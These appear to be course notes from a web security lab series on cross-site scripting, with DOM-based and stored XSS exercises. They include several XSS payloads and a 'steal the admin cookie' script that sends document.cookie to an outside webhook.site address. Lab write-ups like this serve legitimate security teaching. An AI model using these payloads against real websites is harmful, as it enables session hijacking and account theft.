9. XSS LABS

1. LAB XSS 0x01 - DOM BASED XSS

< script> prompt (1) < /script>
Verify with the network tab if a request is sent to the server -> NO REQ is actually SENT!
< img src=x onerror="prompt(1)" />
In the second way we send the request to the server to load an non-existent image just to trigger the prompt.

Challenge Solution: < img src="x" onerror="window.location.href='https://example.com';" />

NOTE: YOU CAN EXPLORE MULTIPLES XSS PAYLOADS EASILY IN THIS LAB TO SEE HOW THEY WORK, WITHOUT ANY HASSLE.

2. LAB XSS 0x02 - STORED CROSS-SITE SCRIPTING (XSS) ATTACKS

Install add-on Firefox Multi Account Containers -> Creates containers for different accounts (Good to know for other CVEs as well :D )
Install add-on for Firefox Cookie-Editor

Test first for HTML injection with a simple HTML tag maybe: < h1> test < /h1>

Exercise

For XSS - Cookie Stealing - setup a cookie on Container 2 Do the XSS from Container 1 Try to steal the cookie with < script>prompt(document.cookie)< /script>

3. XSS CHALLENGE - STORED CROSS-SITE SCRIPTING (XSS) ATTACKS

Steal the Admin Cookie

< script>var i = new Image; i src="https://webhook.site/74c992d0-1f96-49fd-afae-349d9b311150/?"+document.cookie;< /script>

Previous8. Introduction to Cross Site Scripting (XSS)NextAbout Burp

hashtag1. LAB XSS 0x01 - DOM BASED XSS

hashtag2. LAB XSS 0x02 - STORED CROSS-SITE SCRIPTING (XSS) ATTACKS

hashtag3. XSS CHALLENGE - STORED CROSS-SITE SCRIPTING (XSS) ATTACKS

1. LAB XSS 0x01 - DOM BASED XSS

2. LAB XSS 0x02 - STORED CROSS-SITE SCRIPTING (XSS) ATTACKS

3. XSS CHALLENGE - STORED CROSS-SITE SCRIPTING (XSS) ATTACKS